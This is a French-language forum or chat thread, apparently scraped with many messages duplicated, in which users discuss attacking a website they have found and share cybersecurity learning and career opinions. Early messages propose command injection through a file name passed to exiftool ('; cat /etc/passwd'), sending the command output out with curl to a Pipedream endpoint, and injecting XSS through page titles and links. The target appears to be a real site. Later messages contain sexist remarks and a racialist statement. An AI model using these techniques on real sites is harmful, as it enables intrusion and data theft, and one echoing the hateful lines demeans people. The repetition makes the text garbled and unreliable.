ah mdr
t'a testé de mettre un payload RCE dans le nom du fichier ? vue qu'il lance la commande exiftool dessus.
c'est quoi cette passoire de fou que vous avez chopper
t'a testé de mettre un payload RCE dans le nom du fichier ? vue qu'il lance la commande exiftool dessus.
c'est quoi cette passoire de fou que vous avez chopper
Tu voudrais dire du style nomdufichier.png; cat /etc/passwd
par exemple ?
par exemple ?
pipdream c'est juste un api publique crée en deux minute que tu peu appeller.
Genre si tu curl
https://monlienpipdream2f[...]_resultat_de_la_commande}
tu verra le res de la commande dans les logs de ton pipdream
et t'a bypass le faite que tu ais pas l'ouput
Genre si tu curl
tu verra le res de la commande dans les logs de ton pipdream
et t'a bypass le faite que tu ais pas l'ouput
pipdream c'est juste un api publique crée en deux minute que tu peu appeller.
Genre si tu curl https://monlienpipdream2f[...]_resultat_de_la_commande}
tu verra le res de la commande dans les logs de ton pipdream
et t'a bypass le faite que tu ais pas l'ouput
Genre si tu curl
tu verra le res de la commande dans les logs de ton pipdream
et t'a bypass le faite que tu ais pas l'ouput
Tu es très bien payé en cybersécurité si c'est ce que tu veux savoir et ce n'est pas bouché
Il n'est jamais trop tard
Pas encore, je commence via thm pour apprendre bien toutes les bases et ensuite je compte passer sur hackthebox et root-me
Je viens de penser à un truc pour la XSS par contre, le site récupère le titre des pages que tu lui donne et les outputs sur la page, ça veut dire avec ton propre serveur tu crée juste une page qui a comme titre un payload XSS et ça devrait le faire
Je viens de penser à un truc pour la XSS par contre, le site récupère le titre des pages que tu lui donne et les outputs sur la page, ça veut dire avec ton propre serveur tu crée juste une page qui a comme titre un payload XSS et ça devrait le faire
Pas encore, je commence via thm pour apprendre bien toutes les bases et ensuite je compte passer sur hackthebox et root-me
Je viens de penser à un truc pour la XSS par contre, le site récupère le titre des pages que tu lui donne et les outputs sur la page, ça veut dire avec ton propre serveur tu crée juste une page qui a comme titre un payload XSS et ça devrait le faire
Je viens de penser à un truc pour la XSS par contre, le site récupère le titre des pages que tu lui donne et les outputs sur la page, ça veut dire avec ton propre serveur tu crée juste une page qui a comme titre un payload XSS et ça devrait le faire
Pas encore, je commence via thm pour apprendre bien toutes les bases et ensuite je compte passer sur hackthebox et root-me
Je viens de penser à un truc pour la XSS par contre, le site récupère le titre des pages que tu lui donne et les outputs sur la page, ça veut dire avec ton propre serveur tu crée juste une page qui a comme titre un payload XSS et ça devrait le faire
Je viens de penser à un truc pour la XSS par contre, le site récupère le titre des pages que tu lui donne et les outputs sur la page, ça veut dire avec ton propre serveur tu crée juste une page qui a comme titre un payload XSS et ça devrait le faire
root me c'est vraiment incr je trouve parce que t'a vraiment besoin d'avoir compris le truc à 100% pour flag
le seul problème c'est que parfois la difficulté est juste absurde. Genre c'est des trucs qui existe pas irl. Je me souviens d'une LFI ou fallait trouver un fichier sauf que le nom du dossier ou il est habituellement avait était précédé d'un .
genre .toto/flag.txt
et donc tu le voyais pas
le seul problème c'est que parfois la difficulté est juste absurde. Genre c'est des trucs qui existe pas irl. Je me souviens d'une LFI ou fallait trouver un fichier sauf que le nom du dossier ou il est habituellement avait était précédé d'un .
genre .toto/flag.txt
et donc tu le voyais pas
root me c'est vraiment incr je trouve parce que t'a vraiment besoin d'avoir compris le truc à 100% pour flag
le seul problème c'est que parfois la difficulté est juste absurde. Genre c'est des trucs qui existe pas irl. Je me souviens d'une LFI ou fallait trouver un fichier sauf que le nom du dossier ou il est habituellement avait était précédé d'un .
genre .toto/flag.txt
et donc tu le voyais pas
le seul problème c'est que parfois la difficulté est juste absurde. Genre c'est des trucs qui existe pas irl. Je me souviens d'une LFI ou fallait trouver un fichier sauf que le nom du dossier ou il est habituellement avait était précédé d'un .
genre .toto/flag.txt
et donc tu le voyais pas
Tu as aussi un peu ça sur thm quand tu fais les challenges, j'essaye de suivre les "cours" qu'ils te donnent et ensuite je vais faire des challenges pour m’entraîner sur ce que je viens d'apprendre
J'avais fais un peu de root-me il y a quelques mois mais pas grand choses, juste du web basique mais je compte y retourner dès que je serais meilleur
J'avais fais un peu de root-me il y a quelques mois mais pas grand choses, juste du web basique mais je compte y retourner dès que je serais meilleur
J'ai demandé à un ami qui à un vps et un serveur http pour test, je verrais quand il me répond
Check les MP quand tu mets un lien de village ça fait n'importe quoi, tu peux exploiter la XSS comme ça aussi à mon avis
Check les MP quand tu mets un lien de village ça fait n'importe quoi, tu peux exploiter la XSS comme ça aussi à mon avis
"attaque par empilement tu parle des buffer overflow ?"
C'était une façon dont les données étaient gérées à l'époque, ça faisait une pile. Et si on rajoutais trop de données dans cette pile il se passait un truc. Il suffisait d'ajouter les données qu'on voulait pour surcharger la pile et de laisser dépiler la pile, et en gros c'était ton méchant code qui était retenu.
Je ne comprends pas même le concept de pilé-dépilé. Je crois que c'est en lien avec du C
Il y avait des postes plus "chill" comme l'IAM (identity and acces management) qui demande surtout de savoir lire des logs, gérer des trucs d'accès (ça, à la limite - ce serait envisageable pour moi), sauf que c'est pas vraiment ça qui recrute (c'est facile - et beaucoup savent faire)
Il y avait aussi un type de job qui était plutôt réservé aux gonzesses. C'était faire de la "sensibilisation" au personnel, de ne pas cliquer sur les liens, attentions aux clef usb qui trainent
Si t'es pas une meuf oublie, c'est là qu'on les case pour qu'elles fassent leur powerpoint 3.0 sur le "Quishing"
- un enfant de 16 ans qui a eu un pc fixe né dans les années 90 à de base ce niveau sans étudier et serait capable de faire ce job.
Et ensuite, il y avait les VRAIS JOBS. Ceux où on fait pas semblant. Pas de bullshit powerpoint. Du dur : pentesting & co
C'était une façon dont les données étaient gérées à l'époque, ça faisait une pile. Et si on rajoutais trop de données dans cette pile il se passait un truc. Il suffisait d'ajouter les données qu'on voulait pour surcharger la pile et de laisser dépiler la pile, et en gros c'était ton méchant code qui était retenu.
Je ne comprends pas même le concept de pilé-dépilé. Je crois que c'est en lien avec du C
Il y avait des postes plus "chill" comme l'IAM (identity and acces management) qui demande surtout de savoir lire des logs, gérer des trucs d'accès (ça, à la limite - ce serait envisageable pour moi), sauf que c'est pas vraiment ça qui recrute (c'est facile - et beaucoup savent faire)
Il y avait aussi un type de job qui était plutôt réservé aux gonzesses. C'était faire de la "sensibilisation" au personnel, de ne pas cliquer sur les liens, attentions aux clef usb qui trainent
Si t'es pas une meuf oublie, c'est là qu'on les case pour qu'elles fassent leur powerpoint 3.0 sur le "Quishing"
- un enfant de 16 ans qui a eu un pc fixe né dans les années 90 à de base ce niveau sans étudier et serait capable de faire ce job.
Et ensuite, il y avait les VRAIS JOBS. Ceux où on fait pas semblant. Pas de bullshit powerpoint. Du dur : pentesting & co
Je ne suis pas patriote ou nationaliste. Je ne l'ai jamais été. Juste racialiste et anti européen. démocratie = scam.
root me c'est vraiment incr je trouve parce que t'a vraiment besoin d'avoir compris le truc à 100% pour flag
le seul problème c'est que parfois la difficulté est juste absurde. Genre c'est des trucs qui existe pas irl. Je me souviens d'une LFI ou fallait trouver un fichier sauf que le nom du dossier ou il est habituellement avait était précédé d'un .
genre .toto/flag.txt
et donc tu le voyais pas
le seul problème c'est que parfois la difficulté est juste absurde. Genre c'est des trucs qui existe pas irl. Je me souviens d'une LFI ou fallait trouver un fichier sauf que le nom du dossier ou il est habituellement avait était précédé d'un .
genre .toto/flag.txt
et donc tu le voyais pas
"attaque par empilement tu parle des buffer overflow ?"
C'était une façon dont les données étaient gérées à l'époque, ça faisait une pile. Et si on rajoutais trop de données dans cette pile il se passait un truc. Il suffisait d'ajouter les données qu'on voulait pour surcharger la pile et de laisser dépiler la pile, et en gros c'était ton méchant code qui était retenu.
Je ne comprends pas même le concept de pilé-dépilé. Je crois que c'est en lien avec du C
Il y avait des postes plus "chill" comme l'IAM (identity and acces management) qui demande surtout de savoir lire des logs, gérer des trucs d'accès (ça, à la limite - ce serait envisageable pour moi), sauf que c'est pas vraiment ça qui recrute (c'est facile - et beaucoup savent faire)
Il y avait aussi un type de job qui était plutôt réservé aux gonzesses. C'était faire de la "sensibilisation" au personnel, de ne pas cliquer sur les liens, attentions aux clef usb qui trainent
Si t'es pas une meuf oublie, c'est là qu'on les case pour qu'elles fassent leur powerpoint 3.0 sur le "Quishing"
- un enfant de 16 ans qui a eu un pc fixe né dans les années 90 à de base ce niveau sans étudier et serait capable de faire ce job.
Et ensuite, il y avait les VRAIS JOBS. Ceux où on fait pas semblant. Pas de bullshit powerpoint. Du dur : pentesting & co
C'était une façon dont les données étaient gérées à l'époque, ça faisait une pile. Et si on rajoutais trop de données dans cette pile il se passait un truc. Il suffisait d'ajouter les données qu'on voulait pour surcharger la pile et de laisser dépiler la pile, et en gros c'était ton méchant code qui était retenu.
Je ne comprends pas même le concept de pilé-dépilé. Je crois que c'est en lien avec du C
Il y avait des postes plus "chill" comme l'IAM (identity and acces management) qui demande surtout de savoir lire des logs, gérer des trucs d'accès (ça, à la limite - ce serait envisageable pour moi), sauf que c'est pas vraiment ça qui recrute (c'est facile - et beaucoup savent faire)
Il y avait aussi un type de job qui était plutôt réservé aux gonzesses. C'était faire de la "sensibilisation" au personnel, de ne pas cliquer sur les liens, attentions aux clef usb qui trainent
Si t'es pas une meuf oublie, c'est là qu'on les case pour qu'elles fassent leur powerpoint 3.0 sur le "Quishing"
- un enfant de 16 ans qui a eu un pc fixe né dans les années 90 à de base ce niveau sans étudier et serait capable de faire ce job.
Et ensuite, il y avait les VRAIS JOBS. Ceux où on fait pas semblant. Pas de bullshit powerpoint. Du dur : pentesting & co